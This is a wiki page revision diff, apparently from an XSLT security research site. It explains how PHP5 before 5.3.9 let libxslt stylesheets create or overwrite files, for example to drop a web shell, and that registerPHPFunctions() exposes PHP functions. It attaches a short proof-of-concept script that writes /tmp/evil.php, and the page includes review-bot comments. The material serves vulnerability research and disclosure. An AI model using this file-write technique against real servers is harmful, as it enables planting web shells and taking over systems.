Changes for page Application_PHP5

Last modified by Nicolas Gregoire on 2012/02/02 17:29

From version 5.1
edited by Nicolas Gregoire
on 2012/01/13 16:34
Change comment: Deletion of attachment create-file-via-libxslt.php
To version 7.1
edited by Nicolas Gregoire
on 2012/01/13 16:42
Change comment: There is no comment for this version

Details

Page properties
Content
... ... @@ -4,7 +4,13 @@
4 4  
5 5  == Creating files ==
6 6  
7 -Version 5 of the PHP language uses the [[libxslt>>Engine_libxslt]] engine to transform XML documents using XSLT. Prior to version 5.3.9, calls to libxslt were not restricted via xsltSetSecurityPrefs(). It was then possible to create / overwrite files on the engine side, typically for dropping a PHP Web Shell (cf [[Bug #54446>>https://bugs.php.net/bug.php?id=54446||rel="__blank"]]).
7 +Version 5 of the PHP language uses the [[libxslt>>Engine_libxslt]] engine to transform XML documents using XSLT. Prior to version 5.3.9, calls to libxslt were not restricted via xsltSetSecurityPrefs(). It was then possible to create or overwrite files on the engine side, typically for dropping a PHP Web Shell (cf [[Bug #54446>>https://bugs.php.net/bug.php?id=54446||rel="__blank"]]).
8 8  
9 9  
10 10  The attached [[create-file-via-libxslt.php>>attach:create-file-via-libxslt.php]] PoC will drop a basic PHP script in /tmp/.
11 +
12 +== Executing PHP code ==
13 +
14 +A call to [[registerPHPFunctions()>>http://php.net/manual/en/xsltprocessor.registerphpfunctions.php]] allows to execute standard PHP functions directly from the XSLT stylesheet.
15 +
16 +
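Review bot: new line 14 states that registerPHPFunctions() lets the stylesheet run standard PHP functions, but unlike the "Creating files" section it gives no condition or limit on the exposure. Suggest saying that the application itself has to make this call before the transform, and that registerPHPFunctions() takes an optional argument restricting which functions are callable, so a reader can tell whether a given deployment is affected. Wording nit: "allows to execute" reads better as "allows executing". The two empty added lines 15-16 can be dropped.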
create-file-via-libxslt.php
Author
... ... @@ -1,0 +1,1 @@
1 +xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,0 +1,1 @@
1 +601 bytes
Content
... ... @@ -1,0 +1,33 @@
1 +<?php
2 +
3 +$sXml = '<empty/>';
4 +
5 +$sXsl = <<<EOT
6 +<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
7 +
8 + <xsl:template match="/">
9 + <xsl:document href="/tmp/evil.php" method="text">
10 + <xsl:text><![CDATA[<?php phpinfo() ?>]]></xsl:text>
11 + </xsl:document>
12 + </xsl:template>
13 +
14 +</xsl:stylesheet>
15 +EOT;
16 +
17 +# LOAD XML FILE
18 +$XML = new DOMDocument();
19 +$XML->loadXML( $sXml );
20 +
21 +# LOAD XSLT FILE
22 +$XSL = new DOMDocument();
23 +$XSL->loadXML( $sXsl );
24 +
25 +# START XSLT
26 +$xslt = new XSLTProcessor();
27 +$xslt->importStylesheet( $XSL );
28 +
29 +# TRASNFORM & PRINT
30 +print $xslt->transformToXML( $XML );
31 +
32 +?>
33 +
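Review bot: line 30 prints the transform result, but nothing in the script reports whether /tmp/evil.php was actually written, so the outcome has to be checked by hand. Suggest a file_exists() check after the transform and a header comment naming the affected versions (prior to 5.3.9, per the wiki text), which would let the same file confirm that a patched install refuses the write. The comment on line 29 has a typo ("TRASNFORM"), and the trailing "?>" plus blank line 33 can be removed.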